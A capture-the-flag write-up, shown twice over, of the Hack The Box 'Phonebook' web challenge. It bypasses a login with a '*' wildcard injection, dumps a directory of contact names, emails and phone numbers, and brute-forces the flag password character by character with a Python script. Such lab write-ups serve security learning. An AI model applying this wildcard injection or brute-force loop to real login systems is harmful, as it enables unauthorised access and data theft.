Phonebook

Date: 13, May, 2021

Author: Dhilip Sanjay S

Initial Recon

Initially I couldn't find the username and password for login. So, I was looking for someother endpoint other than login.
I was able to find two other enpoints:
- 964430b4cdd199af19b986eaf2193b21f32542d0
- search

Access Denied

The 964430b4cdd199af19b986eaf2193b21f32542d0 page had a search box, which made a POST request to the search endpoint. But it kept on returning Access Denied - 403 Error message.

Dumping all the contacts in the phonebook

On entering the username and password as a wildcard character (*), I was able to login into the site.

Search using regex (.*)

Now in the search box, I tried the same wildcard character, but it didn't work.
So, I used the regex that matches any string .*, which gave me the following output:

Kyle Reese	reese@skynet.com	555-1234567
Ellery Hun	ehun1z@reddit.com	317-959-9562
Madelaine Lush	mlush5@deliciousdays.com	636-918-1006
Currey Conti	cconti0@auda.org.au	529-673-3935
Chaim Smoth	csmothf@sbwire.com	895-974-4117
Eldin Jelf	ejelf1u@google.pl	363-426-3563
Ganny Marti	gmartih@diigo.com	796-793-6925
Jobey Olley	jolleyx@abc.net.au	607-345-0290
Katalin Wilde	kwildep@plala.or.jp	414-839-2681
Stinky Trood	stroodz@foxnews.com	933-416-1003
Tab Zoren	tzorenq@mit.edu	360-678-3613
Ursula Beer	ubeer2f@live.com	794-396-6882
Bryan Arman	barman1x@exblog.jp	640-255-8092
Babette Cunio	bcunio2h@macromedia.com	709-363-0223
Berget Novis	bnovis1j@constantcontact.com	780-278-2572
Ced Engley	cengleyi@springer.com	230-780-1999
Caryn Germon	cgermon4@wiley.com	967-789-6335
Devina Alcide	dalcideu@arizona.edu	828-947-3484
Dionne Lammas	dlammask@washingtonpost.com	824-561-5676
Emmalynn Burnup	eburnupd@networkadvertising.org	148-856-7052
Fredericka Hanks	fhanks1s@census.gov	762-337-5667
Hannah Inder	hinder2a@canalblog.com	315-711-6454
Jay Sharma	jsharmay@t.co	893-382-5236
Lilyan Crepel	lcrepel6@ucoz.com	851-980-1038
Nevile Cogle	ncogle27@answers.com	296-328-0254
Pansy Godier	pgodiero@google.ca	126-853-7977
Rubetta Bernth	rbernthc@biglobe.ne.jp	897-680-2856
Renelle Hyett	rhyett11@google.pl	453-475-9693
Saul Haill	shaill1q@omniture.com	654-478-5757
Stephanus Massot	smassot2@army.mil	717-500-2025
Sarah Moyes	smoyes2e@bing.com	747-445-4381
Sig Tanby	stanby2c@google.es	212-473-4506
Shepherd Tunuy	stunuy2d@spotify.com	293-455-5209
Teddy Bilby	tbilby1r@cornell.edu	357-669-5415
Taylor Capsey	tcapseyl@yahoo.co.jp	118-956-5884
Teddie Redley	tredleye@java.com	658-361-4791
Abagael Guidera	aguideras@barnesandnoble.com	857-685-9711
Arv Teresse	ateresse3@samsung.com	916-453-1626
Bert Father	bfather1v@cnet.com	131-343-2704
Bart McNess	bmcness20@wordpress.com	644-208-9958
Corinne Tirone	ctirone1y@nbcnews.com	572-971-8847
Denny Ashmole	dashmole7@telegraph.co.uk	345-974-0984
Elenore Puttick	eputtickv@newyorker.com	525-705-9780
Frederigo Itzkov	fitzkov1a@amazon.com	681-753-0881
Jessamyn Trusty	jtrusty2i@seesaa.net	423-494-9425
Jamison Vigurs	jvigurs1b@slideshare.net	161-478-7335
Michal Fearby	mfearby2k@ftc.gov	844-581-6099
Mellicent Pessolt	mpessolt8@freewebs.com	735-651-5726
Terencio Ducarne	tducarne9@homestead.com	831-135-9972
Trev Simmers	tsimmersm@phoca.cz	378-186-4422
Aubrey Castille	acastiller@homestead.com	930-681-1706
Andria Gossage	agossage24@wsj.com	184-389-0446
Ansell Shovlin	ashovlin16@blogspot.com	329-311-4183
Ahmed Swyndley	aswyndley1@blinklist.com	954-829-5270
Bay Gregori	bgregori2n@baidu.com	791-721-1297
Charlie Prangle	cprangle2b@shinystat.com	869-131-2435
Dianna Chesser	dchesser10@angelfire.com	901-185-5817
Denna Duplain	dduplain19@springer.com	884-899-2850
Davidson Ibotson	dibotson2m@dedecms.com	709-535-0126
Enid Halbord	ehalbord1k@blogspot.com	318-313-2200
Eimile Pantlin	epantlin1c@admin.ch	690-650-9785
Fina Bonsale	fbonsale1h@meetup.com	631-592-3171
Ives Harvatt	iharvatt1l@hubpages.com	606-103-7270
Jehanna Langmaid	jlangmaidn@themeforest.net	171-550-7961
Karlee Christal	kchristalw@sourceforge.net	354-231-8489
Koo Hansill	khansill25@sourceforge.net	114-439-3748
Kimberley Mourant	kmourant1d@ft.com	792-338-9852
Moll Linster	mlinster17@parallels.com	704-145-7925
Sabra Brumham	sbrumham12@wordpress.com	222-509-0396
Scottie Bucknell	sbucknellg@dagondesign.com	765-181-5301
Stewart Currier	scurrier2r@businessweek.com	480-258-4237
Sollie Windham	swindham1f@squidoo.com	554-620-3103
Veda Lalonde	vlalonde1o@google.com.au	788-911-3962
Aguie Baggaley	abaggaley14@geocities.com	302-693-4223
April Roskelly	aroskelly2q@gravatar.com	177-474-9382
Burtie Bitcheno	bbitcheno29@ucla.edu	859-267-0856
Brunhilda Courtier	bcourtier2o@rakuten.co.jp	610-896-4215
Baxie Ellesmere	bellesmeret@furl.net	815-678-4391
Daryl Pond-Jones	dpondjonesj@gmpg.org	807-353-1751
Elyse Puckring	epuckring1n@dailymotion.com	619-569-7695
Glen Pickford	gpickford26@amazonaws.com	101-639-7455
Issi Coupland	icoupland23@myspace.com	943-625-5169
Joey Stienham	jstienham28@woothemes.com	214-853-1445
Marylee Parbrook	mparbrook1g@sbwire.com	872-906-8081
Reginauld Meggison	rmeggison22@behance.net	460-793-0851
Sybille Jephcott	sjephcott1e@yellowpages.com	454-950-9923
Siouxie Yesichev	syesichev1p@mashable.com	215-132-7221
Diana Moncreiff	dmoncreiff21@telegraph.co.uk	473-166-1352
Deane Shakelade	dshakelade2l@reuters.com	747-399-5336
Far Chansonne	fchansonne13@histats.com	215-579-4465
Ivett Danielczyk	idanielczyka@vk.com	777-574-2837
Johnette Vescovini	jvescovini1m@123-reg.co.uk	470-681-1859
Kary Thackeray	kthackeray1i@yellowpages.com	592-635-6851
Maris Giacopelo	mgiacopelo1w@networkadvertising.org	721-232-8735
Pascal Ainscough	painscough18@state.gov	202-416-7489
Valeda Purselowe	vpurselowe15@smugmug.com	407-245-6246
Allin de Glanville	adeglanvilleb@gov.uk	885-440-5379
Marty Chellenham	mchellenham2g@1und1.de	713-864-5942
Oneida Della Scala	odellascala1t@tuttocitta.it	472-913-8907
Vale O' Concannon	voconcannon2p@cdbaby.com	547-901-0162
Xavier Semeradova	xsemeradova2j@google.es	487-363-1619

But wait, where is the flag??????

Finding the password/flag

We'll try to find the password. My intuition is that the password might be the flag.
We know that the wildcard character (*) will let us login. So, we can try to append some character before and after the wildcard character (*).
So let's try * as the username and HTB{*} as the password, because this the flag format for HTB challenges.
Now we are able to login. This confirms that the password is the flag.
So we need some script to bruteforce the flag.

#!/usr/bin/env python3
import requests
import string

url = "http://138.68.182.108:30733/login"
leaked_pass = list("HTB{")

# Remove the wildcard character
printable = string.printable.replace('*', '')

while True:
	for character in printable:	
		print("Guessing " + ''.join(leaked_pass) + character + "*")
		r = requests.post(url, {"username":"*", "password": ''.join(leaked_pass) + character + "*"})
		#print(r.headers['Content-Length'])
		if r.headers['Content-Length'] == '2586':
			leaked_pass.append(character)
			break
			
	# End of the flag
	if leaked_pass[-1] == '}':
		exit()

Solution

We get the password/flag as: HTB{d1rectory_h4xx0r_is_k00l}

PreviousTemplated NextHTB Academy Overview

Last updated 1 year ago

Initial Recon

Initially I couldn't find the username and password for login. So, I was looking for someother endpoint other than login.

I was able to find two other enpoints:

964430b4cdd199af19b986eaf2193b21f32542d0
search

Access Denied

The 964430b4cdd199af19b986eaf2193b21f32542d0 page had a search box, which made a POST request to the search endpoint. But it kept on returning Access Denied - 403 Error message.

Dumping all the contacts in the phonebook

On entering the username and password as a wildcard character (*), I was able to login into the site.

Search using regex (.*)

Now in the search box, I tried the same wildcard character, but it didn't work.

So, I used the regex that matches any string .*, which gave me the following output:

Kyle Reese	reese@skynet.com	555-1234567
Ellery Hun	ehun1z@reddit.com	317-959-9562
Madelaine Lush	mlush5@deliciousdays.com	636-918-1006
Currey Conti	cconti0@auda.org.au	529-673-3935
Chaim Smoth	csmothf@sbwire.com	895-974-4117
Eldin Jelf	ejelf1u@google.pl	363-426-3563
Ganny Marti	gmartih@diigo.com	796-793-6925
Jobey Olley	jolleyx@abc.net.au	607-345-0290
Katalin Wilde	kwildep@plala.or.jp	414-839-2681
Stinky Trood	stroodz@foxnews.com	933-416-1003
Tab Zoren	tzorenq@mit.edu	360-678-3613
Ursula Beer	ubeer2f@live.com	794-396-6882
Bryan Arman	barman1x@exblog.jp	640-255-8092
Babette Cunio	bcunio2h@macromedia.com	709-363-0223
Berget Novis	bnovis1j@constantcontact.com	780-278-2572
Ced Engley	cengleyi@springer.com	230-780-1999
Caryn Germon	cgermon4@wiley.com	967-789-6335
Devina Alcide	dalcideu@arizona.edu	828-947-3484
Dionne Lammas	dlammask@washingtonpost.com	824-561-5676
Emmalynn Burnup	eburnupd@networkadvertising.org	148-856-7052
Fredericka Hanks	fhanks1s@census.gov	762-337-5667
Hannah Inder	hinder2a@canalblog.com	315-711-6454
Jay Sharma	jsharmay@t.co	893-382-5236
Lilyan Crepel	lcrepel6@ucoz.com	851-980-1038
Nevile Cogle	ncogle27@answers.com	296-328-0254
Pansy Godier	pgodiero@google.ca	126-853-7977
Rubetta Bernth	rbernthc@biglobe.ne.jp	897-680-2856
Renelle Hyett	rhyett11@google.pl	453-475-9693
Saul Haill	shaill1q@omniture.com	654-478-5757
Stephanus Massot	smassot2@army.mil	717-500-2025
Sarah Moyes	smoyes2e@bing.com	747-445-4381
Sig Tanby	stanby2c@google.es	212-473-4506
Shepherd Tunuy	stunuy2d@spotify.com	293-455-5209
Teddy Bilby	tbilby1r@cornell.edu	357-669-5415
Taylor Capsey	tcapseyl@yahoo.co.jp	118-956-5884
Teddie Redley	tredleye@java.com	658-361-4791
Abagael Guidera	aguideras@barnesandnoble.com	857-685-9711
Arv Teresse	ateresse3@samsung.com	916-453-1626
Bert Father	bfather1v@cnet.com	131-343-2704
Bart McNess	bmcness20@wordpress.com	644-208-9958
Corinne Tirone	ctirone1y@nbcnews.com	572-971-8847
Denny Ashmole	dashmole7@telegraph.co.uk	345-974-0984
Elenore Puttick	eputtickv@newyorker.com	525-705-9780
Frederigo Itzkov	fitzkov1a@amazon.com	681-753-0881
Jessamyn Trusty	jtrusty2i@seesaa.net	423-494-9425
Jamison Vigurs	jvigurs1b@slideshare.net	161-478-7335
Michal Fearby	mfearby2k@ftc.gov	844-581-6099
Mellicent Pessolt	mpessolt8@freewebs.com	735-651-5726
Terencio Ducarne	tducarne9@homestead.com	831-135-9972
Trev Simmers	tsimmersm@phoca.cz	378-186-4422
Aubrey Castille	acastiller@homestead.com	930-681-1706
Andria Gossage	agossage24@wsj.com	184-389-0446
Ansell Shovlin	ashovlin16@blogspot.com	329-311-4183
Ahmed Swyndley	aswyndley1@blinklist.com	954-829-5270
Bay Gregori	bgregori2n@baidu.com	791-721-1297
Charlie Prangle	cprangle2b@shinystat.com	869-131-2435
Dianna Chesser	dchesser10@angelfire.com	901-185-5817
Denna Duplain	dduplain19@springer.com	884-899-2850
Davidson Ibotson	dibotson2m@dedecms.com	709-535-0126
Enid Halbord	ehalbord1k@blogspot.com	318-313-2200
Eimile Pantlin	epantlin1c@admin.ch	690-650-9785
Fina Bonsale	fbonsale1h@meetup.com	631-592-3171
Ives Harvatt	iharvatt1l@hubpages.com	606-103-7270
Jehanna Langmaid	jlangmaidn@themeforest.net	171-550-7961
Karlee Christal	kchristalw@sourceforge.net	354-231-8489
Koo Hansill	khansill25@sourceforge.net	114-439-3748
Kimberley Mourant	kmourant1d@ft.com	792-338-9852
Moll Linster	mlinster17@parallels.com	704-145-7925
Sabra Brumham	sbrumham12@wordpress.com	222-509-0396
Scottie Bucknell	sbucknellg@dagondesign.com	765-181-5301
Stewart Currier	scurrier2r@businessweek.com	480-258-4237
Sollie Windham	swindham1f@squidoo.com	554-620-3103
Veda Lalonde	vlalonde1o@google.com.au	788-911-3962
Aguie Baggaley	abaggaley14@geocities.com	302-693-4223
April Roskelly	aroskelly2q@gravatar.com	177-474-9382
Burtie Bitcheno	bbitcheno29@ucla.edu	859-267-0856
Brunhilda Courtier	bcourtier2o@rakuten.co.jp	610-896-4215
Baxie Ellesmere	bellesmeret@furl.net	815-678-4391
Daryl Pond-Jones	dpondjonesj@gmpg.org	807-353-1751
Elyse Puckring	epuckring1n@dailymotion.com	619-569-7695
Glen Pickford	gpickford26@amazonaws.com	101-639-7455
Issi Coupland	icoupland23@myspace.com	943-625-5169
Joey Stienham	jstienham28@woothemes.com	214-853-1445
Marylee Parbrook	mparbrook1g@sbwire.com	872-906-8081
Reginauld Meggison	rmeggison22@behance.net	460-793-0851
Sybille Jephcott	sjephcott1e@yellowpages.com	454-950-9923
Siouxie Yesichev	syesichev1p@mashable.com	215-132-7221
Diana Moncreiff	dmoncreiff21@telegraph.co.uk	473-166-1352
Deane Shakelade	dshakelade2l@reuters.com	747-399-5336
Far Chansonne	fchansonne13@histats.com	215-579-4465
Ivett Danielczyk	idanielczyka@vk.com	777-574-2837
Johnette Vescovini	jvescovini1m@123-reg.co.uk	470-681-1859
Kary Thackeray	kthackeray1i@yellowpages.com	592-635-6851
Maris Giacopelo	mgiacopelo1w@networkadvertising.org	721-232-8735
Pascal Ainscough	painscough18@state.gov	202-416-7489
Valeda Purselowe	vpurselowe15@smugmug.com	407-245-6246
Allin de Glanville	adeglanvilleb@gov.uk	885-440-5379
Marty Chellenham	mchellenham2g@1und1.de	713-864-5942
Oneida Della Scala	odellascala1t@tuttocitta.it	472-913-8907
Vale O' Concannon	voconcannon2p@cdbaby.com	547-901-0162
Xavier Semeradova	xsemeradova2j@google.es	487-363-1619

But wait, where is the flag??????

Finding the password/flag

We'll try to find the password. My intuition is that the password might be the flag.

We know that the wildcard character (*) will let us login. So, we can try to append some character before and after the wildcard character (*).

So let's try * as the username and HTB{*} as the password, because this the flag format for HTB challenges.

Now we are able to login. This confirms that the password is the flag.

So we need some script to bruteforce the flag.

#!/usr/bin/env python3
import requests
import string

url = "http://138.68.182.108:30733/login"
leaked_pass = list("HTB{")

# Remove the wildcard character
printable = string.printable.replace('*', '')

while True:
	for character in printable:	
		print("Guessing " + ''.join(leaked_pass) + character + "*")
		r = requests.post(url, {"username":"*", "password": ''.join(leaked_pass) + character + "*"})
		#print(r.headers['Content-Length'])
		if r.headers['Content-Length'] == '2586':
			leaked_pass.append(character)
			break
			
	# End of the flag
	if leaked_pass[-1] == '}':
		exit()

Initial Recon

Access Denied

Dumping all the contacts in the phonebook

Login with wild card character (*)

Search using regex (.*)

Finding the password/flag

Solution

Initial Recon

Access Denied

Dumping all the contacts in the phonebook

Login with wild card character (*)

Search using regex (.*)

Finding the password/flag

Solution